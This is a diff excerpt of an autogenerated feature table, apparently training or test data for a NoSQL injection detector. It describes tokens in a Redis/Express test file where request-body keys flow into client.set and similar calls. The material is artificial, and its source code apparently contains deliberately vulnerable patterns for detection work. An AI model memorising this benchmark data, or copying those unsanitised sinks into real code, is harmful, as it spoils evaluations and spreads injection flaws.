autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:25:27:27 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:25:27:27 | err | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:30:27:36 | replies | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:30:27:36 | replies | contextSurroundingFunctionParameters | (req, res)\n(err, replies) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:30:27:36 | replies | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:30:27:36 | replies | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:27:30:27:36 | replies | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:20 | client.duplicate | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:20 | client.duplicate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:20 | client.duplicate | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:20 | client.duplicate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:29:20 | client.duplicate | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | client. ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | client. ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | client. ... \\n }) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | client. ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | client. ... \\n }) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | exceptional return of client. ... \\n }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | exceptional return of client. ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | exceptional return of client. ... \\n }) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | exceptional return of client. ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:5:31:6 | exceptional return of client. ... \\n }) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:12:29:20 | duplicate | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:12:29:20 | duplicate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:12:29:20 | duplicate | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:12:29:20 | duplicate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:12:29:20 | duplicate | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:29:21 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:29:21 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:29:21 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:29:21 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:29:21 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | 'arguments' object of anonymous function | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | CalleeFlexibleAccessPath | client.duplicate | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | calleeImports | redis | @@ -4133,6 +19849,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | (err, n ... K\\n } | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | exceptional return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | exceptional return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:22:31:5 | return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:23:29:25 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:23:29:25 | err | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:23:29:25 | err | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:23:29:25 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:23:29:25 | err | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:29:28:29:36 | newClient | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:17 | newClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:17 | newClient | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:17 | newClient | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:17 | newClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:17 | newClient | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:21 | newClient.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:21 | newClient.set | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:21 | newClient.set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:21 | newClient.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:21 | newClient.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | exceptional return of newClie ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | exceptional return of newClie ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | exceptional return of newClie ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | exceptional return of newClie ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | exceptional return of newClie ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | newClie ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | newClie ... value") | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | newClie ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | newClie ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:9:30:35 | newClie ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:19:30:21 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:19:30:21 | set | contextSurroundingFunctionParameters | (req, res)\n(err, newClient) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:19:30:21 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:19:30:21 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:19:30:21 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:23:30:25 | key | CalleeFlexibleAccessPath | newClient.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:23:30:25 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:23:30:25 | key | contextFunctionInterfaces | | @@ -4149,6 +19915,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:28:30:34 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:28:30:34 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:30:28:30:34 | "value" | receiverName | newClient | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:20 | client.duplicate | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:20 | client.duplicate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:20 | client.duplicate | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:20 | client.duplicate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:20 | client.duplicate | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | client.duplicate() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | client.duplicate() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | client.duplicate() | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | client.duplicate() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | client.duplicate() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | exceptional return of client.duplicate() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | exceptional return of client.duplicate() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | exceptional return of client.duplicate() | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | exceptional return of client.duplicate() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:22 | exceptional return of client.duplicate() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:26 | client. ... e().set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:26 | client. ... e().set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:26 | client. ... e().set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:26 | client. ... e().set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:26 | client. ... e().set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | exceptional return of client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:5:32:40 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:12:32:20 | duplicate | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:12:32:20 | duplicate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:12:32:20 | duplicate | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:12:32:20 | duplicate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:12:32:20 | duplicate | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:24:32:26 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:24:32:26 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:24:32:26 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:24:32:26 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:24:32:26 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:28:32:30 | key | CalleeFlexibleAccessPath | client.duplicate().set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:28:32:30 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:28:32:30 | key | calleeImports | redis | @@ -4165,6 +19976,40 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:33:32:39 | "value" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:33:32:39 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:32:33:32:39 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:1:36:33 | import ... 'util'; | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:1:36:33 | import ... 'util'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:1:36:33 | import ... 'util'; | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:10:36:18 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:27:36:32 | 'util' | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:27:36:32 | 'util' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:36:27:36:32 | 'util' | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:3 | app | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:37:8 | app.post | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | app.pos ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | app.pos ... / OK\\n}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | exceptional return of app.pos ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | exceptional return of app.pos ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:1:53:2 | exceptional return of app.pos ... / OK\\n}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:5:37:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:5:37:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:5:37:8 | post | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | calleeImports | express | @@ -4172,6 +20017,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:10:37:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | promisify | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | promisify | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:37:29:37:28 | promisify | fileImports | body-parser express redis util | +| 